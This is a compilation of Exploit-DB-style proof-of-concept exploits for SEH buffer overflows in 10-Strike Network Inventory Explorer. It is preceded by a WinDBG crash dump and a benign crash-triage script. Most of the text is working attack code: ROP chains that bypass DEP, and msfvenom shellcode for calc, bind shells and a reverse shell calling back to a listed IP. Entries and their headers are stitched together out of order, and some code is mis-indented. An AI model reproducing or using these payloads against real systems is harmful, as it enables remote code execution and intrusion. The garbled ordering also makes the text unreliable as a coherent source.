# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203
# NetworkInventoryExplorer+0x2b47:
# 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (f54.f48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
# 41414141 ?? ???
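The two WinDBG records above show the usual progression for this bug class: a first-chance fault inside the rep movs copy, then a second fault where EIP itself holds 0x41414141. Added example, not the author's tooling and not part of the original entry: a small triage script that parses a WinDBG transcript, splits it into one record per exception, and flags control registers holding a pattern fill such as 0x41414141, so that a crash from a fuzzing run can be sorted into "copy ran off the end of a buffer" versus "instruction pointer taken from input" without reading the dump by hand. The embedded transcript is the one from this entry with the comment markers removed; the function names (parse_crash_dump, triage, looks_like_pattern_fill) are mine.

```python
"""Quick triage of WinDBG access-violation register dumps.
Constructed example, not the exploit author's tooling."""
import re

REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
AV_RE = re.compile(r"Access violation - code c0000005 \((first|second) chance\)")

# The two crash records from the entry above, reformatted as one transcript.
SAMPLE_DUMP = """
(f54.f48): Access violation - code c0000005 (first chance)
eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0         nv up ei pl nz na po cy
NetworkInventoryExplorer+0x2b47:
00402b47 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> g
(f54.f48): Access violation - code c0000005 (first chance)
eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
eip=41414141 esp=0018f8dc ebp=41414141 iopl=0         nv up ei pl nz na po nc
41414141 ??              ???
"""


def looks_like_pattern_fill(value):
    """True for values such as 0x41414141: four identical printable bytes,
    the signature of an input fill reaching a control register."""
    b = value.to_bytes(4, "big")
    return len(set(b)) == 1 and 0x20 <= b[0] < 0x7f


def parse_crash_dump(text):
    """Split a WinDBG transcript into one record per exception, collecting
    the register values and the faulting instruction line."""
    records, current = [], None
    for line in text.splitlines():
        line = line.lstrip("# ").rstrip()
        av = AV_RE.search(line)
        if av:
            current = {"chance": av.group(1), "regs": {}, "insn": None}
            records.append(current)
            continue
        if current is None:
            continue
        regs = REG_RE.findall(line)
        if regs:
            current["regs"].update({k: int(v, 16) for k, v in regs})
        elif re.match(r"^[0-9a-f]{8}\s+\S+", line):
            # e.g. "00402b47 f3a5  rep movs ..." or "41414141 ?? ???"
            current["insn"] = line
    return records


def triage(text):
    """Classify each exception record; returns a list of findings."""
    findings = []
    for rec in parse_crash_dump(text):
        regs = rec["regs"]
        controlled = [r for r in ("eip", "ebp", "esp")
                      if r in regs and looks_like_pattern_fill(regs[r])]
        if "eip" in regs and looks_like_pattern_fill(regs["eip"]):
            verdict = "exploitable: instruction pointer taken from input"
        elif rec["insn"] and "rep movs" in rec["insn"]:
            verdict = "memory copy fault: copy ran past the destination buffer"
        else:
            verdict = "unclassified access violation"
        findings.append({"chance": rec["chance"], "controlled": controlled,
                         "eip": regs.get("eip"), "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_DUMP):
        print("%s chance, eip=%08x, controlled=%s: %s"
              % (f["chance"], f["eip"], f["controlled"], f["verdict"]))
```

A pattern-filled EBP next to a pattern-filled EIP is worth reporting separately: it shows the saved frame pointer was overwritten too, which is what a SEH-based crash looks like once the handler record has been consumed, and it is the cue to check the exception chain (!exchain) rather than only the faulting instruction.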
#!/usr/bin/python
import sys, struct
filename = "poc_10_strike_nie.txt"
# Maximum length
maxlen = 5000
# Offsets
crash_esi = 2145 # Initial space until ESI buffer filling
crash_seh = 217 # SEH
crash_nseh = crash_seh - 4 # NSEH
landingpad = 310 # Space for RET NOP landingpad after stackpivoting
# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread
# Payload size: 220 bytes
shellcode = b""
shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06"
shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14"
shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02"
shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb"
shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e"
shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b"
shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0"
shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5"
shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50"
shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94"
shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87"
shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce"
shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12"
shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf"
shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1"
shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9"
shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8"
shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82"
shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68"
shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f"
# ROP chain
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x7c344efe, # POP EDX # RETN [MSVCR71.dll]
0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe]
0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe]
0x61e7555f, # POP EBP # RETN [sqlite3.dll]
0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll]
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x7c34d749, # NEG EAX # RETN [MSVCR71.dll]
0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe]
0xffffffff, #
0x61e0579d, # INC EBX # RETN [sqlite3.dll]
0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe]
0x7c3458e6, # POP EDX # RETN [MSVCR71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll]
0x7c369c4a, # POP ECX # RETN [MSVCR71.dll]
0x7c38dfd7, # &Writable location [MSVCR71.dll]
0x7c34a40e, # POP EDI # RETN [MSVCR71.dll]
0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe]
0x90909090, # nop
0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
# NOPPING
retnop = struct.pack("<L", 0x61e0103e) # RET # sqlite3.dll
prenop = "\x90" * 200 # Pre NOP's after jumping back in stack, sledding until shellcode
postnop = "\x90" * 16 # Post NOP's after running ROP chain to disable DEP
# Jump back on stack for payload space
jmpback = "\xe9\x9f\xf9\xff\xff" # jmp 0xfffff9a4 # Jump back on stack for more space
# Prefix
prefix = "A" * crash_nseh # Junk until NSEH
nseh = "B" * 4 # Junk again, no use for NSEH
seh = struct.pack("<L", 0x0101ce0b) # ADD ESP,0BDC # RETN 0x0C ** [NetworkInventoryExplorer.exe] ** # Stackpivot
suffix = prenop # Prenopping until shellcode
suffix += shellcode # Magic!
suffix += retnop * landingpad # RET NOP as a landingpad after stackpivot, still having DEP enabled
suffix += rop_chain # Disable DEP
suffix += postnop # Old school NOP-sledding
suffix += jmpback # Jump! Just like van Halen
suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix)) # Junk for filling
# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together
try:
file = open(filename,"wb")
file.write(payload)
file.close()
print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
print "[!] Error creating file!"
sys.exit(0)
# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
# Date: 2020-09-02
# Exploit Author: Sectechs
# Vendor Homepage: https://www.10-strike.com
# Version: 8.65
# Tested on: Windows 7 x86 SP1
import os
import sys
import struct
import socket
crash ="A"* 209
# jmp short 8
# kali@root:msf-nasm_shell
# nasm> jmp short 8
Next_SE_Pointer = "\xeb\x06\x90\x90"
# 61e8497a
SE_Handler="\x7a\x49\xe8\x61"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed
payload = (
"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
"\x68\x55\x41\x41")
buffer = crash + Next_SE_Pointer + SE_Handler + "\x90" * 20 + payload + "\x90" * 200
f=open("PoC6.txt","w")
f.write(buffer)
f.close()
'''
Buffer layout of PoC6.txt on the stack:

                         ------------------------------------------
  A * 209  ----------->  | NEXT SEH Pointer  (jmp short 8)        |  <-- ESP
                         |----------------------------------------|
                         | SE_Handler   #POP #POP #RET            |   ▲
                         |----------------------------------------|   | Stack
                         | NOP * 20                               |   |
                         |----------------------------------------|   ▼
                         | PAYLOAD  --------► call back to KALI   |
                         ------------------------------------------
'''
#!/usr/bin/python
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-29-19
# Vulnerable Software: 10-Strike Network Inventory Explorer 8.54
# Vendor Homepage: https://www.10-strike.com/
# Version: 8.54
# Software Link 1: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. open app, select Computers tab
# 3. click on 'From Text File'
# 4. choose 10strike.txt that was generated
# 5. pop calc
# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
# practicing dep bypass by not using auto generated mona.py ropchains
# original seh poc from Hashim Jawad, EDB: 44838
# notes from author state offset is based upon username size, username for poc is 'user'
# badchars; \x00\x0a\x0d\x2f
import struct
filename = "10strike.txt"
junk = "\x41" * 209
seh = struct.pack('<L',0x10013e29)
fill = "\x42"*12
#VirtualProtect()
#ESI = ptr to VirtualProtect()
rop = struct.pack('<L',0x7c3762b3) # POP EAX # RETN
rop += struct.pack('<L',0x61e9b30c) # ptr to &VirtualProtect()
rop += struct.pack('<L',0x1001872e) # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop += struct.pack('<L',0x100101f2) # POP EBX # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x100186d1) # ADD EBX,EAX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c358a01) # INC EBX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c3501d5) # POP ESI # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x61e8509c) # ADD ESI,EBX # RETN
rop += struct.pack('<L',0x7c370464) # INC ESI # RETN
#EBP = ReturnTo (ptr to jmp esp)
#mona.py jmp -r esp -cpb '\x00\x0a\x0d'
rop += struct.pack('<L',0x61e05892) # POP EBP # RETN
rop += struct.pack('<L',0x61e053a9) # push esp # ret
#EBX = dwSize x201
rop += struct.pack('<L',0x7c348495) # POP EAX # RETN
rop += struct.pack('<L',0xfffffdff) #
rop += struct.pack('<L',0x7c351e05) # NEG EAX # RETN
rop += struct.pack('<L',0x100101f2) # POP EBX # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x61e0579d) # INC EBX # RETN
rop += struct.pack('<L',0x100186d1) # ADD EBX,EAX # XOR EAX,EAX # RETN
#EDX = NewProtect (0x40)
rop += struct.pack('<L',0x7c344160) # POP EDX # RETN
rop += struct.pack('<L',0xffffffc0) #
rop += struct.pack('<L',0x7c351eb1) # NEG EDX # RETN
#ECX = lpOldProtect (ptr to W address)
rop += struct.pack('<L',0x7c37157a) # POP ECX # RETN
rop += struct.pack('<L',0x61e894c0) # &Writable location sqlite3
#EDI = ROP NOP (RETN)
rop += struct.pack('<L',0x1001ab53) # POP EDI # RETN
rop += struct.pack('<L',0x1001ab54) # ROP-NOP
#EAX = NOP (0x90909090)
rop += struct.pack('<L',0x7c3647cc) # POP EAX # RETN
rop += struct.pack('<L',0x90909090) # nop
#PUSHAD
rop += struct.pack('<L',0x10019094) # PUSHAD # RETN
nops = "\x90"*10
#msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d\x3a\x5c' -f python
#Payload size: 220 bytes
calc = ""
calc += "\xbb\x29\x86\xf9\x07\xda\xdb\xd9\x74\x24\xf4\x5e\x31"
calc += "\xc9\xb1\x31\x31\x5e\x13\x83\xee\xfc\x03\x5e\x26\x64"
calc += "\x0c\xfb\xd0\xea\xef\x04\x20\x8b\x66\xe1\x11\x8b\x1d"
calc += "\x61\x01\x3b\x55\x27\xad\xb0\x3b\xdc\x26\xb4\x93\xd3"
calc += "\x8f\x73\xc2\xda\x10\x2f\x36\x7c\x92\x32\x6b\x5e\xab"
calc += "\xfc\x7e\x9f\xec\xe1\x73\xcd\xa5\x6e\x21\xe2\xc2\x3b"
calc += "\xfa\x89\x98\xaa\x7a\x6d\x68\xcc\xab\x20\xe3\x97\x6b"
calc += "\xc2\x20\xac\x25\xdc\x25\x89\xfc\x57\x9d\x65\xff\xb1"
calc += "\xec\x86\xac\xff\xc1\x74\xac\x38\xe5\x66\xdb\x30\x16"
calc += "\x1a\xdc\x86\x65\xc0\x69\x1d\xcd\x83\xca\xf9\xec\x40"
calc += "\x8c\x8a\xe2\x2d\xda\xd5\xe6\xb0\x0f\x6e\x12\x38\xae"
calc += "\xa1\x93\x7a\x95\x65\xf8\xd9\xb4\x3c\xa4\x8c\xc9\x5f"
calc += "\x07\x70\x6c\x2b\xa5\x65\x1d\x76\xa3\x78\x93\x0c\x81"
calc += "\x7b\xab\x0e\xb5\x13\x9a\x85\x5a\x63\x23\x4c\x1f\x9b"
calc += "\x69\xcd\x09\x34\x34\x87\x08\x59\xc7\x7d\x4e\x64\x44"
calc += "\x74\x2e\x93\x54\xfd\x2b\xdf\xd2\xed\x41\x70\xb7\x11"
calc += "\xf6\x71\x92\x71\x99\xe1\x7e\x58\x3c\x82\xe5\xa4"
pad = "\x45"*(3000 - len(junk + seh + fill + rop + nops + calc))
buffer = junk + seh + fill + rop + nops + calc + pad
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title : 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)
# Exploit Author : Hashim Jawad - ihack4falafel
# Vendor Homepage : https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on : Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Under Computers tab click on 'From Text File'
# - Open Evil.txt and boom!
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting
# the stack by 8 bytes, see buffer for reference.
# - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on
# your username, the following is the path used while developing the exploit (default on Windows 7):
# [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
# - Pro edition is affected as well.
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
#Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"
buffer = '\x41' * 207 # filler to nSEH offset (211-4)
buffer += '\x9f\x4e\xe9\x61' # 0x61E94E9F [sqlite3.dll] | jmp esp
buffer += '\x90\x90\x90\x90' # nSEH
buffer += '\x90\x90\x90\x90' # SEH
buffer += shellcode # bind shell
buffer += '\xcc' * (3000-207-12-len(shellcode)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafelx
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Under Help, click 'Enter Registration Key'.
# - Paste the contents of Evil.txt and click OK.
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - There is ample space prior to SEH overwrite.
# - Pro edition is affected as well.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
# - Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
buffer = '\x41' * 4188 # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x7a\x49\xe8\x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8 # nops
buffer += shellcode # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7
